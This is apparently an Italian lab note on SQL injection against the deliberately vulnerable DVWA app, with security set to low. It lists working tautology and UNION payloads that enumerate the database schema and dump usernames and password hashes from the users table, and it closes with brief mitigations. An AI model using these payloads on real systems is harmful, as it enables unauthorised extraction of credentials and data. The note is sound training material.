ifconfig → ip

kali: <browser> ip/login.php → admin password → dvwa security → low

SQL Injection

Obiettivo: eseguire comandi SQL arbitrari per estrarre dati dal database

1’ OR ‘1’=’1

1’ UNION select 1, version()#

user()

database()

table_name FROM information_schema.tables WHERE table_schema='dvwa'#

column_name FROM information_schema.columns WHERE table_name='users'#

concat(user_id, ':', first_name, ':', last_name, ':', user, ':', password) FROM users#

Debolezze

• l’applicazione costruisce un comando SQL utilizzando un input esterno e non neutralizza caratteri speciali del linguaggio SQL

Mitigazioni

• filtro dei caratteri speciali → mysql_real_escape_string()
• quoting dell’argomento → annulla il significato semantico di OR